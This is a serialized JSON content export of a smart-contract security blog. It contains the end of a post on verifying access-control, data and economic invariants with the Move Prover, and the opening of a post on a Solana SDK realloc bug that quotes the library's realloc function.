spec_multiply_u64",{"type":26,"tag":137,"props":15216,"children":15217},{"style":5601},[15218],{"type":32,"value":165},{"type":26,"tag":137,"props":15220,"children":15221},{"style":5584},[15222],{"type":32,"value":15223},"val",{"type":26,"tag":137,"props":15225,"children":15226},{"style":5601},[15227],{"type":32,"value":1108},{"type":26,"tag":137,"props":15229,"children":15230},{"style":5584},[15231],{"type":32,"value":15232},"multiplier",{"type":26,"tag":137,"props":15234,"children":15235},{"style":5601},[15236],{"type":32,"value":15237},") > MAX_U64 ",{"type":26,"tag":137,"props":15239,"children":15240},{"style":5584},[15241],{"type":32,"value":15242},"with",{"type":26,"tag":137,"props":15244,"children":15245},{"style":5601},[15246],{"type":32,"value":15247}," EMULTIPLICATION;\n",{"type":26,"tag":137,"props":15249,"children":15250},{"class":5559,"line":5745},[15251],{"type":26,"tag":137,"props":15252,"children":15253},{"style":5601},[15254],{"type":32,"value":15255},"      }\n",{"type":26,"tag":137,"props":15257,"children":15258},{"class":5559,"line":5850},[15259,15263,15267,15271,15275,15279,15283,15287,15291,15295,15299,15303,15307,15311,15315],{"type":26,"tag":137,"props":15260,"children":15261},{"style":5584},[15262],{"type":32,"value":11515},{"type":26,"tag":137,"props":15264,"children":15265},{"style":5584},[15266],{"type":32,"value":8792},{"type":26,"tag":137,"props":15268,"children":15269},{"style":5682},[15270],{"type":32,"value":15214},{"type":26,"tag":137,"props":15272,"children":15273},{"style":5601},[15274],{"type":32,"value":165},{"type":26,"tag":137,"props":15276,"children":15277},{"style":5584},[15278],{"type":32,"value":15223},{"type":26,"tag":137,"props":15280,"children":15281},{"style":5590},[15282],{"type":32,"value":7072},{"type":26,"tag":137,"props":15284,"children":15285},{"style":5584},[15286],{"type":32,"value":12322},{"type":26,"tag":137,"props":15288,"children":15289},{"style":5601},[15290],{"type":32,"value":1108},{"type":26,"tag":137,"props":15292,"children":15293},{"style":5584},[15294],{"type":32,"value":15232},{"type":26,"tag":137,"props":15296,"children":15297},{"style":5590},[15298],{"type":32,"value":7072},{"type":26,"tag":137,"props":15300,"children":15301},{"style":6009},[15302],{"type":32,"value":15197},{"type":26,"tag":137,"props":15304,"children":15305},{"style":5601},[15306],{"type":32,"value":200},{"type":26,"tag":137,"props":15308,"children":15309},{"style":5590},[15310],{"type":32,"value":7072},{"type":26,"tag":137,"props":15312,"children":15313},{"style":5584},[15314],{"type":32,"value":12322},{"type":26,"tag":137,"props":15316,"children":15317},{"style":5601},[15318],{"type":32,"value":5875},{"type":26,"tag":137,"props":15320,"children":15321},{"class":5559,"line":5878},[15322,15326,15330,15334,15339,15343,15348,15353],{"type":26,"tag":137,"props":15323,"children":15324},{"style":5601},[15325],{"type":32,"value":11296},{"type":26,"tag":137,"props":15327,"children":15328},{"style":5584},[15329],{"type":32,"value":15223},{"type":26,"tag":137,"props":15331,"children":15332},{"style":5590},[15333],{"type":32,"value":12406},{"type":26,"tag":137,"props":15335,"children":15336},{"style":5584},[15337],{"type":32,"value":15338}," multiplier",{"type":26,"tag":137,"props":15340,"children":15341},{"style":5590},[15342],{"type":32,"value":470},{"type":26,"tag":137,"props":15344,"children":15345},{"style":5601},[15346],{"type":32,"value":15347},"value) ",{"type":26,"tag":137,"props":15349,"children":15350},{"style":5590},[15351],{"type":32,"value":15352},">>",{"type":26,"tag":137,"props":15354,"children":15355},{"style":5626},[15356],{"type":32,"value":15357}," 32\n",{"type":26,"tag":137,"props":15359,"children":15360},{"class":5559,"line":5891},[15361],{"type":26,"tag":137,"props":15362,"children":15363},{"style":5601},[15364],{"type":32,"value":15255},{"type":26,"tag":118,"props":15366,"children":15368},{"id":15367},"access-control-policies",[15369],{"type":32,"value":15370},"Access Control Policies",{"type":26,"tag":35,"props":15372,"children":15373},{},[15374],{"type":32,"value":15375},"Somewhat similar to error conditions, it's often useful to enforce explicit access control policies at the specification level.",{"type":26,"tag":35,"props":15377,"children":15378},{},[15379,15381,15387,15389,15394],{"type":32,"value":15380},"For example, in ",{"type":26,"tag":130,"props":15382,"children":15384},{"className":15383},[],[15385],{"type":32,"value":15386},"std::offer",{"type":32,"value":15388}," we are able to see that the function should abort if and only if there does not exist an offer, ",{"type":26,"tag":762,"props":15390,"children":15391},{},[15392],{"type":32,"value":15393},"or",{"type":32,"value":15395}," the recipient is now allowed.",{"type":26,"tag":5512,"props":15397,"children":15399},{"code":15398,"language":5551,"meta":7,"className":5552,"style":7},"    spec redeem {\n      /// Aborts if there is no offer under `offer_address` or if the account\n      /// cannot redeem the offer.\n      /// Ensures that the offered struct under `offer_address` is removed.\n      aborts_if !exists\u003COffer\u003COffered>>(offer_address);\n      aborts_if !is_allowed_recipient\u003COffered>(offer_address, signer::address_of(account));\n      ensures !exists\u003COffer\u003COffered>>(offer_address);\n      ensures result == old(global\u003COffer\u003COffered>>(offer_address).offered);\n    }\n",[15400],{"type":26,"tag":130,"props":15401,"children":15402},{"__ignoreMap":7},[15403,15420,15428,15436,15444,15491,15549,15592,15658],{"type":26,"tag":137,"props":15404,"children":15405},{"class":5559,"line":5560},[15406,15411,15416],{"type":26,"tag":137,"props":15407,"children":15408},{"style":5584},[15409],{"type":32,"value":15410},"    spec",{"type":26,"tag":137,"props":15412,"children":15413},{"style":5584},[15414],{"type":32,"value":15415}," redeem",{"type":26,"tag":137,"props":15417,"children":15418},{"style":5601},[15419],{"type":32,"value":5875},{"type":26,"tag":137,"props":15421,"children":15422},{"class":5559,"line":5412},[15423],{"type":26,"tag":137,"props":15424,"children":15425},{"style":5564},[15426],{"type":32,"value":15427},"      /// Aborts if there is no offer under `offer_address` or if the account\n",{"type":26,"tag":137,"props":15429,"children":15430},{"class":5559,"line":5417},[15431],{"type":26,"tag":137,"props":15432,"children":15433},{"style":5564},[15434],{"type":32,"value":15435},"      /// cannot redeem the offer.\n",{"type":26,"tag":137,"props":15437,"children":15438},{"class":5559,"line":5642},[15439],{"type":26,"tag":137,"props":15440,"children":15441},{"style":5564},[15442],{"type":32,"value":15443},"      /// Ensures that the offered struct under `offer_address` is removed.\n",{"type":26,"tag":137,"props":15445,"children":15446},{"class":5559,"line":5745},[15447,15451,15456,15460,15464,15469,15473,15478,15482,15487],{"type":26,"tag":137,"props":15448,"children":15449},{"style":5584},[15450],{"type":32,"value":11640},{"type":26,"tag":137,"props":15452,"children":15453},{"style":5590},[15454],{"type":32,"value":15455}," !",{"type":26,"tag":137,"props":15457,"children":15458},{"style":5584},[15459],{"type":32,"value":9288},{"type":26,"tag":137,"props":15461,"children":15462},{"style":5601},[15463],{"type":32,"value":8391},{"type":26,"tag":137,"props":15465,"children":15466},{"style":6009},[15467],{"type":32,"value":15468},"Offer",{"type":26,"tag":137,"props":15470,"children":15471},{"style":5601},[15472],{"type":32,"value":8391},{"type":26,"tag":137,"props":15474,"children":15475},{"style":6009},[15476],{"type":32,"value":15477},"Offered",{"type":26,"tag":137,"props":15479,"children":15480},{"style":5601},[15481],{"type":32,"value":9310},{"type":26,"tag":137,"props":15483,"children":15484},{"style":5584},[15485],{"type":32,"value":15486},"offer_address",{"type":26,"tag":137,"props":15488,"children":15489},{"style":5601},[15490],{"type":32,"value":6430},{"type":26,"tag":137,"props":15492,"children":15493},{"class":5559,"line":5850},[15494,15498,15502,15507,15511,15515,15519,15523,15528,15532,15536,15540,15545],{"type":26,"tag":137,"props":15495,"children":15496},{"style":5584},[15497],{"type":32,"value":11640},{"type":26,"tag":137,"props":15499,"children":15500},{"style":5590},[15501],{"type":32,"value":15455},{"type":26,"tag":137,"props":15503,"children":15504},{"style":5584},[15505],{"type":32,"value":15506},"is_allowed_recipient",{"type":26,"tag":137,"props":15508,"children":15509},{"style":5601},[15510],{"type":32,"value":8391},{"type":26,"tag":137,"props":15512,"children":15513},{"style":6009},[15514],{"type":32,"value":15477},{"type":26,"tag":137,"props":15516,"children":15517},{"style":5601},[15518],{"type":32,"value":10195},{"type":26,"tag":137,"props":15520,"children":15521},{"style":5584},[15522],{"type":32,"value":15486},{"type":26,"tag":137,"props":15524,"children":15525},{"style":5601},[15526],{"type":32,"value":15527},", signer",{"type":26,"tag":137,"props":15529,"children":15530},{"style":5590},[15531],{"type":32,"value":6072},{"type":26,"tag":137,"props":15533,"children":15534},{"style":5682},[15535],{"type":32,"value":9793},{"type":26,"tag":137,"props":15537,"children":15538},{"style":5601},[15539],{"type":32,"value":165},{"type":26,"tag":137,"props":15541,"children":15542},{"style":5584},[15543],{"type":32,"value":15544},"account",{"type":26,"tag":137,"props":15546,"children":15547},{"style":5601},[15548],{"type":32,"value":9807},{"type":26,"tag":137,"props":15550,"children":15551},{"class":5559,"line":5878},[15552,15556,15560,15564,15568,15572,15576,15580,15584,15588],{"type":26,"tag":137,"props":15553,"children":15554},{"style":5584},[15555],{"type":32,"value":10772},{"type":26,"tag":137,"props":15557,"children":15558},{"style":5590},[15559],{"type":32,"value":15455},{"type":26,"tag":137,"props":15561,"children":15562},{"style":5584},[15563],{"type":32,"value":9288},{"type":26,"tag":137,"props":15565,"children":15566},{"style":5601},[15567],{"type":32,"value":8391},{"type":26,"tag":137,"props":15569,"children":15570},{"style":6009},[15571],{"type":32,"value":15468},{"type":26,"tag":137,"props":15573,"children":15574},{"style":5601},[15575],{"type":32,"value":8391},{"type":26,"tag":137,"props":15577,"children":15578},{"style":6009},[15579],{"type":32,"value":15477},{"type":26,"tag":137,"props":15581,"children":15582},{"style":5601},[15583],{"type":32,"value":9310},{"type":26,"tag":137,"props":15585,"children":15586},{"style":5584},[15587],{"type":32,"value":15486},{"type":26,"tag":137,"props":15589,"children":15590},{"style":5601},[15591],{"type":32,"value":6430},{"type":26,"tag":137,"props":15593,"children":15594},{"class":5559,"line":5891},[15595,15599,15603,15607,15612,15616,15621,15625,15629,15633,15637,15641,15645,15649,15653],{"type":26,"tag":137,"props":15596,"children":15597},{"style":5584},[15598],{"type":32,"value":10772},{"type":26,"tag":137,"props":15600,"children":15601},{"style":5584},[15602],{"type":32,"value":11748},{"type":26,"tag":137,"props":15604,"children":15605},{"style":5590},[15606],{"type":32,"value":5866},{"type":26,"tag":137,"props":15608,"children":15609},{"style":5682},[15610],{"type":32,"value":15611}," old",{"type":26,"tag":137,"props":15613,"children":15614},{"style":5601},[15615],{"type":32,"value":165},{"type":26,"tag":137,"props":15617,"children":15618},{"style":5584},[15619],{"type":32,"value":15620},"global",{"type":26,"tag":137,"props":15622,"children":15623},{"style":5601},[15624],{"type":32,"value":8391},{"type":26,"tag":137,"props":15626,"children":15627},{"style":6009},[15628],{"type":32,"value":15468},{"type":26,"tag":137,"props":15630,"children":15631},{"style":5601},[15632],{"type":32,"value":8391},{"type":26,"tag":137,"props":15634,"children":15635},{"style":6009},[15636],{"type":32,"value":15477},{"type":26,"tag":137,"props":15638,"children":15639},{"style":5601},[15640],{"type":32,"value":9310},{"type":26,"tag":137,"props":15642,"children":15643},{"style":5584},[15644],{"type":32,"value":15486},{"type":26,"tag":137,"props":15646,"children":15647},{"style":5601},[15648],{"type":32,"value":200},{"type":26,"tag":137,"props":15650,"children":15651},{"style":5590},[15652],{"type":32,"value":470},{"type":26,"tag":137,"props":15654,"children":15655},{"style":5601},[15656],{"type":32,"value":15657},"offered);\n",{"type":26,"tag":137,"props":15659,"children":15660},{"class":5559,"line":5909},[15661],{"type":26,"tag":137,"props":15662,"children":15663},{"style":5601},[15664],{"type":32,"value":5945},{"type":26,"tag":35,"props":15666,"children":15667},{},[15668],{"type":32,"value":15669},"These access control specifications make it impossible to accidentally remove security critical access control policies later.",{"type":26,"tag":118,"props":15671,"children":15673},{"id":15672},"complex-mathematical-formulae",[15674],{"type":32,"value":15675},"Complex Mathematical Formulae",{"type":26,"tag":35,"props":15677,"children":15678},{},[15679,15681,15686],{"type":32,"value":15680},"Whether it's a decimal implementation or more complex data structures, it's often useful to verify that the expected output is ",{"type":26,"tag":762,"props":15682,"children":15683},{},[15684],{"type":32,"value":15685},"always",{"type":32,"value":15687}," the output.",{"type":26,"tag":35,"props":15689,"children":15690},{},[15691],{"type":32,"value":15692},"Proving that your fundamental data structures work exactly as intended will give you much more confidence in the remainder of your codebase.",{"type":26,"tag":35,"props":15694,"children":15695},{},[15696,15698,15705],{"type":32,"value":15697},"For example, in our work with ",{"type":26,"tag":41,"props":15699,"children":15702},{"href":15700,"rel":15701},"https://laminar.markets/",[45],[15703],{"type":32,"value":15704},"Laminar Markets",{"type":32,"value":15706},", we provided recommendations for verifying their internal splay tree implementation against a simpler priority queue data structure.",{"type":26,"tag":118,"props":15708,"children":15710},{"id":15709},"data-invariants",[15711],{"type":32,"value":15712},"Data Invariants",{"type":26,"tag":35,"props":15714,"children":15715},{},[15716,15718,15724,15726,15732,15734,15740,15742,15748],{"type":32,"value":15717},"Formal verification provides the best environment to verify that certain ",{"type":26,"tag":130,"props":15719,"children":15721},{"className":15720},[],[15722],{"type":32,"value":15723},"variables",{"type":32,"value":15725}," or ",{"type":26,"tag":130,"props":15727,"children":15729},{"className":15728},[],[15730],{"type":32,"value":15731},"resources",{"type":32,"value":15733}," don't exceed the intended boundaries. Let's consider the struct from below. We can ensure that ",{"type":26,"tag":130,"props":15735,"children":15737},{"className":15736},[],[15738],{"type":32,"value":15739},"index",{"type":32,"value":15741}," is never greater than 4 using a ",{"type":26,"tag":130,"props":15743,"children":15745},{"className":15744},[],[15746],{"type":32,"value":15747},"struct invariant",{"type":32,"value":470},{"type":26,"tag":5512,"props":15750,"children":15752},{"code":15751,"language":5551,"meta":7,"className":5552,"style":7},"struct Type {\n    index: u64\n}\n\nspec Type {\n    invariant index \u003C 4;\n}\n",[15753],{"type":26,"tag":130,"props":15754,"children":15755},{"__ignoreMap":7},[15756,15772,15789,15796,15803,15818,15842],{"type":26,"tag":137,"props":15757,"children":15758},{"class":5559,"line":5560},[15759,15763,15768],{"type":26,"tag":137,"props":15760,"children":15761},{"style":5573},[15762],{"type":32,"value":11990},{"type":26,"tag":137,"props":15764,"children":15765},{"style":6009},[15766],{"type":32,"value":15767}," Type",{"type":26,"tag":137,"props":15769,"children":15770},{"style":5601},[15771],{"type":32,"value":5875},{"type":26,"tag":137,"props":15773,"children":15774},{"class":5559,"line":5412},[15775,15780,15784],{"type":26,"tag":137,"props":15776,"children":15777},{"style":5584},[15778],{"type":32,"value":15779},"    index",{"type":26,"tag":137,"props":15781,"children":15782},{"style":5590},[15783],{"type":32,"value":7072},{"type":26,"tag":137,"props":15785,"children":15786},{"style":6009},[15787],{"type":32,"value":15788}," u64\n",{"type":26,"tag":137,"props":15790,"children":15791},{"class":5559,"line":5417},[15792],{"type":26,"tag":137,"props":15793,"children":15794},{"style":5601},[15795],{"type":32,"value":6507},{"type":26,"tag":137,"props":15797,"children":15798},{"class":5559,"line":5642},[15799],{"type":26,"tag":137,"props":15800,"children":15801},{"emptyLinePlaceholder":18},[15802],{"type":32,"value":6276},{"type":26,"tag":137,"props":15804,"children":15805},{"class":5559,"line":5745},[15806,15810,15814],{"type":26,"tag":137,"props":15807,"children":15808},{"style":5584},[15809],{"type":32,"value":10860},{"type":26,"tag":137,"props":15811,"children":15812},{"style":6009},[15813],{"type":32,"value":15767},{"type":26,"tag":137,"props":15815,"children":15816},{"style":5601},[15817],{"type":32,"value":5875},{"type":26,"tag":137,"props":15819,"children":15820},{"class":5559,"line":5850},[15821,15825,15830,15834,15838],{"type":26,"tag":137,"props":15822,"children":15823},{"style":5584},[15824],{"type":32,"value":10877},{"type":26,"tag":137,"props":15826,"children":15827},{"style":5584},[15828],{"type":32,"value":15829}," index",{"type":26,"tag":137,"props":15831,"children":15832},{"style":5590},[15833],{"type":32,"value":11305},{"type":26,"tag":137,"props":15835,"children":15836},{"style":5626},[15837],{"type":32,"value":14336},{"type":26,"tag":137,"props":15839,"children":15840},{"style":5601},[15841],{"type":32,"value":5604},{"type":26,"tag":137,"props":15843,"children":15844},{"class":5559,"line":5878},[15845],{"type":26,"tag":137,"props":15846,"children":15847},{"style":5601},[15848],{"type":32,"value":6507},{"type":26,"tag":35,"props":15850,"children":15851},{},[15852,15854,15861,15862,15868],{"type":32,"value":15853},"We were able to verify more complex properties in our recent audits for ",{"type":26,"tag":41,"props":15855,"children":15858},{"href":15856,"rel":15857},"https://layerzero.network/",[45],[15859],{"type":32,"value":15860},"LayerZero",{"type":32,"value":3339},{"type":26,"tag":41,"props":15863,"children":15866},{"href":15864,"rel":15865},"http://ariesmarkets.xyz/",[45],[15867],{"type":32,"value":9374},{"type":32,"value":15869},", but the details are left as an exercise to the reader.",{"type":26,"tag":118,"props":15871,"children":15873},{"id":15872},"economic-invariants",[15874],{"type":32,"value":15875},"Economic Invariants.",{"type":26,"tag":35,"props":15877,"children":15878},{},[15879],{"type":32,"value":15880},"Proper economic invariants can require more creativity to come up with but can be extremely effective at securing your protocol.",{"type":26,"tag":35,"props":15882,"children":15883},{},[15884],{"type":32,"value":15885},"For example, you should never be able to drain coins from a pool by adding and removing shares. In practice, you might implement this as a utility helper function.",{"type":26,"tag":5512,"props":15887,"children":15888},{"code":10552,"language":5551,"meta":7,"className":5552,"style":7},[15889],{"type":26,"tag":130,"props":15890,"children":15891},{"__ignoreMap":7},[15892,15899,15982,16021,16040,16047,16062,16085,16108,16131],{"type":26,"tag":137,"props":15893,"children":15894},{"class":5559,"line":5560},[15895],{"type":26,"tag":137,"props":15896,"children":15897},{"style":5564},[15898],{"type":32,"value":10564},{"type":26,"tag":137,"props":15900,"children":15901},{"class":5559,"line":5412},[15902,15906,15910,15914,15918,15922,15926,15930,15934,15938,15942,15946,15950,15954,15958,15962,15966,15970,15974,15978],{"type":26,"tag":137,"props":15903,"children":15904},{"style":5584},[15905],{"type":32,"value":9153},{"type":26,"tag":137,"props":15907,"children":15908},{"style":5682},[15909],{"type":32,"value":10576},{"type":26,"tag":137,"props":15911,"children":15912},{"style":5601},[15913],{"type":32,"value":165},{"type":26,"tag":137,"props":15915,"children":15916},{"style":5584},[15917],{"type":32,"value":10585},{"type":26,"tag":137,"props":15919,"children":15920},{"style":5590},[15921],{"type":32,"value":7072},{"type":26,"tag":137,"props":15923,"children":15924},{"style":6009},[15925],{"type":32,"value":8445},{"type":26,"tag":137,"props":15927,"children":15928},{"style":5601},[15929],{"type":32,"value":1108},{"type":26,"tag":137,"props":15931,"children":15932},{"style":5584},[15933],{"type":32,"value":10602},{"type":26,"tag":137,"props":15935,"children":15936},{"style":5590},[15937],{"type":32,"value":7072},{"type":26,"tag":137,"props":15939,"children":15940},{"style":6009},[15941],{"type":32,"value":8445},{"type":26,"tag":137,"props":15943,"children":15944},{"style":5601},[15945],{"type":32,"value":200},{"type":26,"tag":137,"props":15947,"children":15948},{"style":5590},[15949],{"type":32,"value":7072},{"type":26,"tag":137,"props":15951,"children":15952},{"style":5601},[15953],{"type":32,"value":4625},{"type":26,"tag":137,"props":15955,"children":15956},{"style":6009},[15957],{"type":32,"value":10627},{"type":26,"tag":137,"props":15959,"children":15960},{"style":5601},[15961],{"type":32,"value":1108},{"type":26,"tag":137,"props":15963,"children":15964},{"style":6009},[15965],{"type":32,"value":10627},{"type":26,"tag":137,"props":15967,"children":15968},{"style":5601},[15969],{"type":32,"value":5671},{"type":26,"tag":137,"props":15971,"children":15972},{"style":5584},[15973],{"type":32,"value":8929},{"type":26,"tag":137,"props":15975,"children":15976},{"style":6009},[15977],{"type":32,"value":10648},{"type":26,"tag":137,"props":15979,"children":15980},{"style":5601},[15981],{"type":32,"value":5875},{"type":26,"tag":137,"props":15983,"children":15984},{"class":5559,"line":5417},[15985,15989,15993,15997,16001,16005,16009,16013,16017],{"type":26,"tag":137,"props":15986,"children":15987},{"style":5573},[15988],{"type":32,"value":10660},{"type":26,"tag":137,"props":15990,"children":15991},{"style":5584},[15992],{"type":32,"value":10665},{"type":26,"tag":137,"props":15994,"children":15995},{"style":5590},[15996],{"type":32,"value":5593},{"type":26,"tag":137,"props":15998,"children":15999},{"style":5682},[16000],{"type":32,"value":10674},{"type":26,"tag":137,"props":16002,"children":16003},{"style":5601},[16004],{"type":32,"value":165},{"type":26,"tag":137,"props":16006,"children":16007},{"style":5584},[16008],{"type":32,"value":10585},{"type":26,"tag":137,"props":16010,"children":16011},{"style":5601},[16012],{"type":32,"value":1108},{"type":26,"tag":137,"props":16014,"children":16015},{"style":5584},[16016],{"type":32,"value":10602},{"type":26,"tag":137,"props":16018,"children":16019},{"style":5601},[16020],{"type":32,"value":6430},{"type":26,"tag":137,"props":16022,"children":16023},{"class":5559,"line":5642},[16024,16028,16032,16036],{"type":26,"tag":137,"props":16025,"children":16026},{"style":5682},[16027],{"type":32,"value":10702},{"type":26,"tag":137,"props":16029,"children":16030},{"style":5601},[16031],{"type":32,"value":165},{"type":26,"tag":137,"props":16033,"children":16034},{"style":5584},[16035],{"type":32,"value":10711},{"type":26,"tag":137,"props":16037,"children":16038},{"style":5601},[16039],{"type":32,"value":5742},{"type":26,"tag":137,"props":16041,"children":16042},{"class":5559,"line":5745},[16043],{"type":26,"tag":137,"props":16044,"children":16045},{"style":5601},[16046],{"type":32,"value":8457},{"type":26,"tag":137,"props":16048,"children":16049},{"class":5559,"line":5850},[16050,16054,16058],{"type":26,"tag":137,"props":16051,"children":16052},{"style":5584},[16053],{"type":32,"value":10730},{"type":26,"tag":137,"props":16055,"children":16056},{"style":5584},[16057],{"type":32,"value":10576},{"type":26,"tag":137,"props":16059,"children":16060},{"style":5601},[16061],{"type":32,"value":5875},{"type":26,"tag":137,"props":16063,"children":16064},{"class":5559,"line":5878},[16065,16069,16073,16077,16081],{"type":26,"tag":137,"props":16066,"children":16067},{"style":5584},[16068],{"type":32,"value":10746},{"type":26,"tag":137,"props":16070,"children":16071},{"style":5584},[16072],{"type":32,"value":10751},{"type":26,"tag":137,"props":16074,"children":16075},{"style":5590},[16076],{"type":32,"value":289},{"type":26,"tag":137,"props":16078,"children":16079},{"style":5573},[16080],{"type":32,"value":10760},{"type":26,"tag":137,"props":16082,"children":16083},{"style":5601},[16084],{"type":32,"value":5604},{"type":26,"tag":137,"props":16086,"children":16087},{"class":5559,"line":5891},[16088,16092,16096,16100,16104],{"type":26,"tag":137,"props":16089,"children":16090},{"style":5584},[16091],{"type":32,"value":10772},{"type":26,"tag":137,"props":16093,"children":16094},{"style":5584},[16095],{"type":32,"value":10777},{"type":26,"tag":137,"props":16097,"children":16098},{"style":5590},[16099],{"type":32,"value":10782},{"type":26,"tag":137,"props":16101,"children":16102},{"style":5584},[16103],{"type":32,"value":10787},{"type":26,"tag":137,"props":16105,"children":16106},{"style":5601},[16107],{"type":32,"value":5604},{"type":26,"tag":137,"props":16109,"children":16110},{"class":5559,"line":5909},[16111,16115,16119,16123,16127],{"type":26,"tag":137,"props":16112,"children":16113},{"style":5584},[16114],{"type":32,"value":10772},{"type":26,"tag":137,"props":16116,"children":16117},{"style":5584},[16118],{"type":32,"value":10803},{"type":26,"tag":137,"props":16120,"children":16121},{"style":5590},[16122],{"type":32,"value":10782},{"type":26,"tag":137,"props":16124,"children":16125},{"style":5584},[16126],{"type":32,"value":10812},{"type":26,"tag":137,"props":16128,"children":16129},{"style":5601},[16130],{"type":32,"value":5604},{"type":26,"tag":137,"props":16132,"children":16133},{"class":5559,"line":5930},[16134],{"type":26,"tag":137,"props":16135,"children":16136},{"style":5601},[16137],{"type":32,"value":8457},{"type":26,"tag":35,"props":16139,"children":16140},{},[16141],{"type":32,"value":16142},"Some other ideas include",{"type":26,"tag":4820,"props":16144,"children":16145},{},[16146,16151,16156],{"type":26,"tag":3430,"props":16147,"children":16148},{},[16149],{"type":32,"value":16150},"Swapping through an AMM should never lead to a decrease in one side of the pool without also increasing the other side. In other words, no free money",{"type":26,"tag":3430,"props":16152,"children":16153},{},[16154],{"type":32,"value":16155},"Lending protocols should always be fully collateralized after a series of deposit, borrow, and withdraw instructions.",{"type":26,"tag":3430,"props":16157,"children":16158},{},[16159],{"type":32,"value":16160},"Orderbooks should never lose money after an order is placed and then canceled.",{"type":26,"tag":92,"props":16162,"children":16163},{"id":7892},[16164],{"type":32,"value":7895},{"type":26,"tag":35,"props":16166,"children":16167},{},[16168],{"type":32,"value":16169},"In this post, we've explored how to properly utilize the Move Prover to verify critical invariants about your codebase.",{"type":26,"tag":35,"props":16171,"children":16172},{},[16173],{"type":32,"value":16174},"In our upcoming posts, we will explore how to turn the Move Prover into a weapon for squashing security vulnerabilities by learning how to ask the right questions, so stay tuned!",{"type":26,"tag":35,"props":16176,"children":16177},{},[16178,16180,16185],{"type":32,"value":16179},"We're passionate about formal verification and pushing the edge of what's possible in Move security. If you have any thoughts, or would like to explore an audit, feel free to reach out to me ",{"type":26,"tag":41,"props":16181,"children":16183},{"href":11830,"rel":16182},[45],[16184],{"type":32,"value":11834},{"type":32,"value":470},{"type":26,"tag":7949,"props":16187,"children":16188},{},[16189],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":16191},[16192,16193,16196,16203],{"id":11894,"depth":5412,"text":11897},{"id":11948,"depth":5412,"text":11951,"children":16194},[16195],{"id":12199,"depth":5417,"text":12195},{"id":15100,"depth":5412,"text":15103,"children":16197},[16198,16199,16200,16201,16202],{"id":15116,"depth":5417,"text":15119},{"id":15367,"depth":5417,"text":15370},{"id":15672,"depth":5417,"text":15675},{"id":15709,"depth":5417,"text":15712},{"id":15872,"depth":5417,"text":15875},{"id":7892,"depth":5412,"text":7895},"content:blog:2022-09-16-move-prover.md","blog/2022-09-16-move-prover.md","blog/2022-09-16-move-prover",{"_path":16208,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":16209,"description":16210,"author":16211,"image":16212,"date":16215,"isFeatured":18,"onBlogPage":18,"tags":16216,"body":16217,"_type":5433,"_id":21335,"_source":5435,"_file":21336,"_stem":21337,"_extension":5438},"/blog/2022-12-09-rust-realloc-and-references","Rust, Realloc, and References","Rust is safe.. right? Not if your dependencies are unsafe.. A deep dive into a subtle Solana SDK bug, Rust internals, and how we found it all.","ethan",{"src":16213,"height":16214,"width":17},"/posts/rust-realloc-and-references/title.jpg",512,"2022-12-09",[5451,11858],{"type":23,"children":16218,"toc":21319},[16219,16247,16267,16937,16957,16968,16980,17113,17123,17129,17155,17496,17541,17868,17931,17944,18017,18085,18106,18119,18133,18482,18493,18498,18629,18680,18706,18718,18891,19027,19068,19105,19171,19176,19214,19268,19279,19422,19434,19440,19446,19479,19493,19615,19634,19662,19668,19758,19849,19855,19860,19906,20174,20249,20260,20287,20619,20631,20704,20977,21014,21315],{"type":26,"tag":35,"props":16220,"children":16221},{},[16222,16224,16230,16232,16237,16239,16245],{"type":32,"value":16223},"It all started with an audit of a program that used ",{"type":26,"tag":130,"props":16225,"children":16227},{"className":16226},[],[16228],{"type":32,"value":16229},"realloc",{"type":32,"value":16231}," on an account, without any bounds checks on the new size allowed. It seemed like the developers assumed that if the new size was too large, the ",{"type":26,"tag":130,"props":16233,"children":16235},{"className":16234},[],[16236],{"type":32,"value":16229},{"type":32,"value":16238}," call (from ",{"type":26,"tag":130,"props":16240,"children":16242},{"className":16241},[],[16243],{"type":32,"value":16244},"solana_program",{"type":32,"value":16246},") would error out appropriately.",{"type":26,"tag":35,"props":16248,"children":16249},{},[16250,16252,16258,16259,16266],{"type":32,"value":16251},"But we're not ones to just assume things around here, so let's take a look at how ",{"type":26,"tag":130,"props":16253,"children":16255},{"className":16254},[],[16256],{"type":32,"value":16257},"AccountInfo::realloc",{"type":32,"value":8085},{"type":26,"tag":41,"props":16260,"children":16263},{"href":16261,"rel":16262},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#124-148",[45],[16264],{"type":32,"value":16265},"implemented",{"type":32,"value":7072},{"type":26,"tag":5512,"props":16268,"children":16270},{"className":5552,"code":16269,"language":5551,"meta":7,"style":7},"pub fn realloc(&self, new_len: usize, zero_init: bool) -> Result\u003C(), ProgramError> {\n    let orig_len = self.data_len();\n\n    // realloc\n    unsafe {\n        // First set new length in the serialized data\n        let ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n        *ptr = new_len as u64;\n\n        // Then set the new length in the local slice\n        let ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n        *ptr = new_len as u64;\n    }\n\n    // zero-init if requested\n    if zero_init && new_len > orig_len {\n        sol_memset(\n            &mut self.try_borrow_mut_data()?[orig_len..],\n            0,\n            new_len.saturating_sub(orig_len),\n        );\n    }\n\n    Ok(())\n}\n",[16271],{"type":26,"tag":130,"props":16272,"children":16273},{"__ignoreMap":7},[16274,16368,16402,16409,16417,16429,16437,16529,16562,16569,16577,16707,16738,16745,16752,16760,16794,16806,16855,16867,16896,16903,16910,16917,16930],{"type":26,"tag":137,"props":16275,"children":16276},{"class":5559,"line":5560},[16277,16282,16287,16292,16296,16300,16305,16309,16314,16318,16323,16327,16332,16336,16340,16344,16349,16354,16359,16364],{"type":26,"tag":137,"props":16278,"children":16279},{"style":5573},[16280],{"type":32,"value":16281},"pub",{"type":26,"tag":137,"props":16283,"children":16284},{"style":5573},[16285],{"type":32,"value":16286}," fn",{"type":26,"tag":137,"props":16288,"children":16289},{"style":5682},[16290],{"type":32,"value":16291}," 